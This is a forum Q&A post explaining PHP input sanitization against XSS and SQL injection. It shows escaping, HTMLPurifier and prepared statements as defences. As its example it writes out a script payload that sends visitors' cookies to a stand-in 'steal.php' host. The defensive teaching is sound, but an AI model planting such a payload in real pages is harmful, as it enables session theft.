
What is PHP sanitization

category: Ask
Created by: Dr.Ferrous


Question:

What is PHP sanitization? I could not find it here.

by CSI

Answer:

Sanitization is not here because it is a concept, not a feature that is tied to PHP!

You can sanitize in C++, Objective-C, Python, Java, Kotlin, JavaScript, MS Word, MS PowerPoint...

Sanitization means cleaning or escaping a value from unwanted or bad content that may put your software/website at risk and vulnerable to exploits.

For example, consider a social network platform where users register and set their names and statuses, and one of the users writes this on his status:

Hello World <script>document.write('<img src="http://www.example.com/steal.php?cookies='+document.cookie+'" />')</script>

Writing this in the browser will not cause any problem and your server will not complain about saving the content in your DB, but when a user visits and sees that status, he will actually send his cookies to example.com, and thus his account will be hacked.

This is called XSS, and it happens due to bad or absent sanitization.

This will hack your users' accounts, but how about hacking your entire website because of the absence of sanitization? Yes, it's called SQL injection.

 

To protect yourself from SQL injections, I recommend using sanitization and prepared statements.

 

To sanitize that status using PHP's filtering:

 

The output will be:

&#60;script&#62;document.write(&#39;&#60;img src=&#34;http://www.example.com/steal.php?cookies=&#39;+document.cookie+&#39;&#34; /&#62;&#39;)&#60;/script&#62;

It will look the same in the browser, but the difference is that the browser will treat '<', '>', '"' and other special characters as plain text rather than parsing them as HTML, so the script will not be executed.

 

To sanitize that status using HTMLPurifier:

 

The output will be empty, and that's why I like HTMLPurifier: it removes all scripts, which is much better than escaping special characters, and it keeps the content of other tags. But you still need sanitization to protect against SQL injection.

Never save any input to database from users without sanitizing it, or it will insanitize you!
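As an added example that is not part of the original answer: the HTML escaping step and the prepared statement the answer recommends, shown together in PHP on the status from above. The in-memory SQLite PDO connection and the `statuses` table are assumptions so the script runs stand-alone.

```php
<?php
// Added example, not the original answer's code: escape the status for HTML
// output and store it with a prepared statement. $status is attacker-controlled.
declare(strict_types=1);

// Constructed sample input: the status quoted in the answer above.
$status = 'Hello World <script>document.write(\'<img src="http://www.example.com/steal.php?cookies=\'+document.cookie+\'" />\')</script>';

// Output-side defence (XSS): encode the characters the browser would parse as HTML.
// FILTER_SANITIZE_SPECIAL_CHARS yields numeric entities (&#60; ...) like the output
// quoted in the answer; htmlspecialchars() yields named entities (&lt; ...).
$encoded  = filter_var($status, FILTER_SANITIZE_SPECIAL_CHARS);
$safeHtml = htmlspecialchars($status, ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo $encoded, PHP_EOL;
echo '<p>Status: ' . $safeHtml . '</p>', PHP_EOL;

// Storage-side defence (SQL injection): a prepared statement sends the value
// separately from the query text, so no quote or comment trick inside $status
// can change what the statement does. Assumed: SQLite in memory, no server needed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE statuses (id INTEGER PRIMARY KEY, user_id INTEGER, body TEXT)');

$stmt = $pdo->prepare('INSERT INTO statuses (user_id, body) VALUES (:user_id, :body)');
$stmt->execute([':user_id' => 42, ':body' => $status]);

// Read it back and escape at render time; the stored text itself is unchanged,
// so it is not double-encoded if it is later shown somewhere other than HTML.
$row = $pdo->query('SELECT body FROM statuses WHERE id = 1')->fetch(PDO::FETCH_ASSOC);
echo '<p>' . htmlspecialchars($row['body'], ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>', PHP_EOL;
```

The prepared statement protects the database regardless of what the status contains, while the escaping protects other users' browsers when the status is rendered; the two defences address different sinks and neither replaces the other.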